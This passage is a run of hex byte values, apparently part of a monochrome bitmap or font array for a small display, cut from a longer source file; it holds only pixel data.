0X00,0X7F,0XFF,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X7F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,
0XFF,0X80,0X00,0X3F,0XFF,0XF8,0X00,0X3F,0X80,0X00,0X07,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,0X00,
0X00,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,
0XFF,0XC0,0X00,0X1F,0XFF,0XF8,0X00,0X7F,0XC0,0X00,0X07,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X01,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X7F,
0XFF,0XC0,0X00,0X1F,0XFF,0XF8,0X00,0X7F,0XC0,0X00,0X0F,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X07,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,
0XFF,0XC0,0X00,0X1F,0XFF,0XF8,0X00,0X7F,0XC0,0X00,0X0F,0XFC,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X0F,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,
0XFF,0XC0,0X00,0X1F,0XFF,0XF0,0X00,0X7F,0XC0,0X00,0X0F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X3F,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,
0XFF,0XE0,0X00,0X0F,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X1F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0X7F,0XFF,0XFF,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,
0XFF,0XE0,0X00,0X0F,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X1F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFE,0X00,0X00,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,
0XFF,0XE0,0X00,0X0F,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X1F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X03,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XE0,0X00,0X3F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XF0,0X00,0X3F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XFC,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XF0,0X00,0X3F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X00,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,
0XFF,0XF0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XF0,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X07,
0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,
0X00,0X00,0X00,0X03,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X01,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,
0X00,0X00,0X00,0X03,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X03,
0XFF,0XFF,0XFF,0XF0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,
0X00,0X00,0X00,0X03,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0X7F,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XF0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X7F,0XF8,0X00,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X03,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X7F,0XFC,0X00,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0XFF,0XFF,0XFF,0XC0,0X01,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0XFF,0XFF,0XFF,0XC0,0X01,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X07,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,
0X7F,0XFF,0XFF,0X80,0X03,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X3F,0XFF,0XFF,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,
0X1F,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,
0X0F,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X7F,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X0F,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,
0X03,0XFF,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,0XFF,0XF0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X7F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFC,0X00,
0X00,0X7F,0X80,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XCF,0XFF,0XFF,0XFF,0X00,0X00,0X3F,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X7F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFE,0X00,
0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X1F,0XFF,0XE0,0X00,0X00,0X7F,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,
0XFF,0XFF,0X00,0X00,0X3F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0X00,
0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,
0XFF,0XFF,0X80,0X00,0X3F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0X80,
0X00,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X3F,0XFF,
0XFF,0XFF,0X80,0X00,0X3F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XC0,
0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X7F,0XFF,
0XFF,0XFF,0X80,0X00,0X1F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XE0,
0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X7F,0XFF,
0XFF,0XFF,0X80,0X00,0X1F,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X7F,0XFF,
0XFF,0XFF,0XC0,0X00,0X1F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFC,
0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X1F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X0F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XE0,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XC0,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XC0,0X00,0X0F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFE,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,0X00,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XE0,0X00,0X0F,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XE0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XE0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,
